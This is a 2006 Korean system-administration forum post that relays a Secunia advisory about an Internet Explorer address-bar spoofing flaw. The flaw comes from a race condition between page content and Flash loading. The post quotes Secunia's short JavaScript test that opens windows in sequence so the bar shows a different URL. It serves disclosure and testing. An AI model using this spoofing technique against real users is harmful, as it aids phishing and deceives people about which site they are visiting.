시스템관리자의 쉼터 커피닉스 커피향이 나는 *NIX
커피닉스
시스템/네트웍/보안을 다루는 곳
 FAQFAQ   검색검색   멤버리스트멤버리스트   사용자 그룹사용자 그룹   사용자 등록하기사용자 등록하기 
 개인 정보개인 정보   비공개 메시지를 확인하려면 로그인하십시오비공개 메시지를 확인하려면 로그인하십시오   로그인로그인 

가입없이 누구나 글을 쓸 수 있습니다. 공지사항에 대한 댓글까지도..




BBS >> 설치, 운영 Q&A | 네트웍, 보안 Q&A | 일반 Q&A || 정보마당 | AWS || 자유게시판 | 구인구직 || 공지사항 | 의견제시
IE 주소바 위장 취약점

 
글 쓰기   답변 달기    커피닉스, 시스템 엔지니어의 쉼터 게시판 인덱스 -> *NIX / IT 정보
이전 주제 보기 :: 다음 주제 보기  
글쓴이 메시지
truefeel
카페 관리자


가입: 2003년 7월 24일
올린 글: 1277
위치: 대한민국

올리기올려짐: 2006.4.09 일, 11:37 pm    주제: IE 주소바 위장 취약점 인용과 함께 답변

Securina ( http://secunia.com/advisories/19521/ ) 에 따르면 Hai Nam Luke는 MS익스플로러의 주소창을 다른 주소로 위장할 수 있는 취약점을 발견했습니다.
이걸 이용하면 피싱 공격시에 쉽게 속아넘어갈 수 있겠네요.

이 취약점은 웹컨텐츠와 플래쉬 파일(.swf)이 로딩할 때 race condition 때문에 발생하며,
이를 통해 웹컨텐츠에서 보여주는 주소와는 다른 사이트의 URL을 주소바에 표시할 수 있습니다.
IE 6.0와 Windows XP SP1/SP2환경 뿐만 아니라 IE 7 Beta2 preview 버전(3월 버전)에서도 발견되었습니다.

http://secunia.com/Internet_Explorer_Address_Bar_Spoofing_Vulnerability_Test/
에서 이 취약점을 테스트해볼 수 있습니다.
취약한 브라우저에서는 http://www.google.com/ 이라고 나올것이고, 그 외는 secunia.com/ 의 주소가 표시될 겁니다.

코드:

<a href="javascript:StartTest();"><font color="#000000">Test Now - Left Click On This Link</font></a>

<script language="JavaScript">
function openWin(url)
{
  window.open(url, 'window');
}

function StartTest()
{
  openWin('http://www.google.com/');
  setTimeout("openWin('/19521_swf/?" + Math.random() + "');", 300);
  setTimeout("openWin('/19521_swf_result/');", 2500);
}
</script>


[ XP SP2에서 IE6에서 테스트한 결과 ] - 로딩되는 주소와 주소바가 다른 것을 확인할 수 있습니다.
위로
사용자 정보 보기 비밀 메시지 보내기 글 올린이의 웹사이트 방문
이전 글 표시:   
글 쓰기   답변 달기    커피닉스, 시스템 엔지니어의 쉼터 게시판 인덱스 -> *NIX / IT 정보 시간대: GMT + 9 시간(한국)
페이지 1 중 1

 
건너뛰기:  
새로운 주제를 올릴 수 있습니다
답글을 올릴 수 있습니다
주제를 수정할 수 없습니다
올린 글을 삭제할 수 없습니다
투표를 할 수 없습니다


Powered by phpBB © 2001, 2005 phpBB Group